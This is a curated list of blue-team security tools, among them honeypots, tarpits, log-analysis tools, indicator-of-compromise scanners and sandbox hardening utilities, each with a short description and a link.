Blue Team

Tools designed for either passive or active defence systems. Includes Honeypot systems, Event-log analyses and monitoring tools

Ansible Role Log4Shell Detector	Role to run log4shell-detector script on Debian and RHEL base OS.	https://github.com/r0mdau/ansible-role-log4shell-detector
AntiVMDetection	Tool to harden VM's against environment detection	https://github.com/nsmfoo/antivmdetection
Artillery	Combined honeypot, monitoring tool, and alerting system	https://github.com/BinaryDefense/artillery
BoomBox	Auto-Install script for Cuckoo Malware analysis sandbox	https://github.com/nbeede/BoomBox
Canarytokens	Canarytokens helps track activity and actions on your network.	https://github.com/thinkst/canarytokens
chkrootkit	Linux rootkit finder	http://chkrootkit.org/
CobaltStrikeScan	Scan files or process memory for Cobalt Strike beacons and parse their configuration	https://github.com/Apr4h/CobaltStrikeScan
Endlessh	SSH Tarpit	https://github.com/skeeto/endlessh
Email Header Analyser	Parses email headers into human readable format	https://github.com/cyberdefenders/email-header-analyzer
EVTX-to-MITRE-Attack	EVTX to MITRE Att@ck is a Security Information Management System orientated project. It provides >270 Windows IOCs indicators classified per Tactic and Technique in order to address different security scenarios with your SIEM	https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack
HoneyUp	An uploader honeypot designed to look like poor website security.	https://github.com/LogoiLab/honeyup
Infection Monkey	The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection	https://www.guardicore.com/infectionmonkey/
Kushtaka	All-In-One honeypot solution for under-resourced blue teams	https://kushtaka.io/
Labrea	ARP tarpit	https://labrea.sourceforge.io/labrea-info.html
Logout4Shell	he Cybereason research team has developed the following code that exploits the same vulnerability and the payload therein sets the vulnerable setting as disabled. The payload then searches for all LoggerContext and removes the JNDI Interpolator preventing even recursive abuses. this effectively blocks any further attempt to exploit Log4Shell on this server.	https://github.com/Cybereason/Logout4Shell
LogonTracer	Tool to investigate malicious logons by visualising and analysing Active Directory event logs	https://github.com/JPCERTCC/LogonTracer
Loki	Scanner for Simple Indicators of Compromise	https://github.com/Neo23x0/Loki
Manuka	Manuka is an Open-source intelligence (OSINT) honeypot that monitors reconnaissance attempts by threat actors and generates actionable intelligence for Blue Teamers.	https://github.com/spaceraccoon/manuka
Maltrail	Malicious traffic detection system	https://github.com/stamparm/maltrail
Pafish	Used to detect sandboxes and virtual environments - Useful for Cuckoo	https://github.com/a0rtega/pafish
ssh-audit	Tool to audit ssh server and client configs	https://github.com/jtesta/ssh-audit
VMCloak	Tool to harden against VM detection - Designed for use with Cuckoo